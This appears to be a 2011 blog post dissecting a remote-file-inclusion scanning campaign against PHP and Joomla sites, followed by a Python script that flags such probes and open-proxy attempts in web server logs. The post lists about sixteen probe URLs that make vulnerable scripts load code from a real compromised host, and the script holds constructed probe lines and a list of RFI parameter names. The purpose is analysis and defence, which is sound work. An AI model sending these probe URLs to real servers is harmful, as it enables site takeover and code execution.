
Wednesday, 26 October 2011

Assuming the current IP number of the outer loop is abc.def.131.45, the scanner sends requests such as:

http://abc.def.131.45//components/com_ezine/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45//components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45//components/com_mojo/wp-trackback.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index0.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index1.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index2.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/administrator/index3.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/tools/calendar.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/redirect.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/rss.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/click.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/errors.php?error=http://nic.bupt.edu.cn/dirname/filename
http://abc.def.131.45/images/errors.php?error=http://nic.bupt.edu.cn/dirname/filename

Where:
abc.def.131.45 is the current IP number being scanned,
nic.bupt.edu.cn is the OldVictim,
dirname is the directory in which the attacker has saved his code file (see the dissections below),
filename is the TestFile (it is not used only for test purposes, as mentioned above; see the dissections below).

Author's Note: nic.bupt.edu.cn was being used intensively in real attacks while I was writing this article. I intentionally blanked the directory and file names.

What about the resources consumed? They are not a problem for the attacker, because none of the bandwidth, disk space, memory, CPU and so on that is spent comes from his own machines; all of it is taken from the proxyserver and the oldvictim. At the end he has a list of IP numbers that can be exploited remotely, and he may run the same algorithm against other IP range blocks as he wishes.

Now let's examine what happened on each of the hosts mentioned above:
1- We know that the oldvictim was already hacked. It is a lost host; indeed it is a harmful one. Someone should unplug its network cable. As long as it stays on the network while hacked, it is used to damage thousands of other hosts per hour around the world. You can examine a current list of such websites at www.bizimbal.com/docs/ex0.html.
2- The proxyserver is probably an unattended host run by an inexperienced system administrator who is not aware of what he is assisting. Actually, he is equally responsible for the attacks, because he is the one who hides the real IP number of the attacker. (I have some additional suspicions about some proxy servers.) So, if you are running an open proxy web server, close it unless you run it intentionally under your tight control. And remember, you have to keep all access logs so you can provide them to the legal authorities in case of a serious crime.
3- The scanned hosts have only a few rejected requests in their error_log, with error code "404 Not found".
4- The ones that are exploitable are hacked soon afterwards with the attacker's real code, loaded from the oldvictim or from older oldvictims.
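As an added example that is not part of the original post, here is a small Python scanner a site owner could run over the web server's access log to pick out the two things described in points 2 and 3 above: requests carrying a remote URL in a query parameter (the probes, whether they were answered with 404 or served with a 200), and requests whose request line is an absolute URI for a host that is not ours (a client trying to use the server as a forward proxy). The log lines, the client addresses, the payload host payload.example.net and the OWN_HOSTS set are all constructed for this example.

```python
"""Flag remote-file-inclusion probes and forward-proxy attempts in Apache
'combined' access log lines.  Added example; the sample log lines, addresses
and host names below are constructed, not taken from a real server."""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format:
#   ip ident user [time] "METHOD target HTTP/x.y" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names used by the probe URLs in the post (compared lower-cased).
# A parameter with any other name is still reported when its value is a remote URL.
KNOWN_RFI_PARAMS = ("mosconfig_absolute_path", "_server[document_root]", "error")
KNOWN_RFI_PREFIXES = ("globals[",)

# Host names this server legitimately answers for (assumed for the example).
OWN_HOSTS = {"www.example.org", "example.org"}

# Constructed sample log: one client probing several scripts, one client sending
# a probe through us as if we were a proxy, and one harmless redirect request.
SAMPLE_LOG = """\
203.0.113.9 - - [26/Oct/2011:10:15:02 +0700] "GET /administrator/index.php?mosConfig_absolute_path=http://payload.example.net/d/f HTTP/1.0" 404 213 "-" "libwww-perl/5.8"
203.0.113.9 - - [26/Oct/2011:10:15:03 +0700] "GET /components/com_ezine/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://payload.example.net/d/f HTTP/1.0" 404 221 "-" "libwww-perl/5.8"
203.0.113.9 - - [26/Oct/2011:10:15:04 +0700] "GET /errors.php?error=http://payload.example.net/d/f HTTP/1.0" 200 1834 "-" "libwww-perl/5.8"
198.51.100.7 - - [26/Oct/2011:10:16:11 +0700] "GET http://192.0.2.45/rss.php?_SERVER[DOCUMENT_ROOT]=http://payload.example.net/d/f HTTP/1.0" 404 210 "-" "libwww-perl/5.8"
198.51.100.20 - - [26/Oct/2011:10:17:30 +0700] "GET /redirect.php?to=/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_url_params(target):
    """Return [(name, value, known_name)] for each query parameter whose value is a
    remote URL; that is the signature of a remote-file-inclusion probe."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            lname = name.lower()
            known = lname in KNOWN_RFI_PARAMS or lname.startswith(KNOWN_RFI_PREFIXES)
            hits.append((name, value, known))
    return hits


def is_proxy_attempt(target, own_hosts=OWN_HOSTS):
    """True when the request line carries an absolute URI for a host that is not
    ours, i.e. the client tried to use this server as a forward (open) proxy."""
    parts = urlsplit(target)
    return parts.scheme in ("http", "https") and parts.hostname not in own_hosts


def scan(lines):
    """Aggregate findings over many log lines: probe count per client, remote hosts
    named as payload source, clients that tried to proxy through us, and probes
    that were answered with a 2xx status (the script exists and ran; check it)."""
    summary = {"by_client": {}, "payload_hosts": set(),
               "proxy_clients": set(), "served_probes": []}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        target = rec["target"]
        if is_proxy_attempt(target):
            summary["proxy_clients"].add(rec["ip"])
        probes = remote_url_params(target)
        if not probes:
            continue
        summary["by_client"][rec["ip"]] = summary["by_client"].get(rec["ip"], 0) + 1
        for _name, value, _known in probes:
            host = urlsplit(value).hostname
            if host:
                summary["payload_hosts"].add(host)
        if rec["status"].startswith("2"):
            summary["served_probes"].append((rec["ip"], target))
    return summary


if __name__ == "__main__":
    result = scan(SAMPLE_LOG.splitlines())
    for key, value in result.items():
        print(f"{key}: {value}")
```

A 2xx answer to a probe does not by itself prove that the included file was fetched and executed; it only says the script exists and responded, which is reason enough to inspect it. Likewise, an absolute-URI request line shows that someone tried to use the server as a proxy, not that the attempt worked, so correlate it with outbound connections from the web server before concluding the proxy is open. The payload hosts collected in `payload_hosts` are the "oldvictims" of the post and are worth blocking at the egress firewall so that even a vulnerable script cannot reach them.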
